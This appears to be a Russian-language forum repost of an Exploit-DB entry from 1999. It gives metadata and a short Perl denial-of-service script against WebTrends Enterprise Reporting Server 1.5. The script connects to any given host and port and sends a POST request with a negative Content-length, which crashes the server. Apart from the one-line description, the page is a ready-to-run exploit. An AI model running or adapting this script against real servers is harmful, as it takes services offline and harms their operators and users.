- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19446
- Проверка EDB
-
- Пройдено
- Автор
- RPC
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- null
- Дата публикации
- 1999-08-08
WebTrends Enterprise Reporting Server 1.5 - Negative Content Length Denial of Service
Код:
source: https://www.securityfocus.com/bid/569/info
Specifying a negative content-length in a POST operation to the WebTrends Enterprise Reporting Server will crash the web server.
#!/usr/bin/perl -w
# Example DoS against WebTrends Enterprise Reporting Server
# 8/8/99
# rpc <[email protected]>
use IO::Socket;
die "usage: $0 <host> <port>" unless (@ARGV == 2);
($host, $port) = @ARGV;
$s = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp')
or die "Can't create socket.";
print $s "POST /\r\n";
print $s "Content-type: text/plain\r\n";
print $s "Content-length: -1", "\r\n"x5;
print "done.\n";- Источник
- www.exploit-db.com
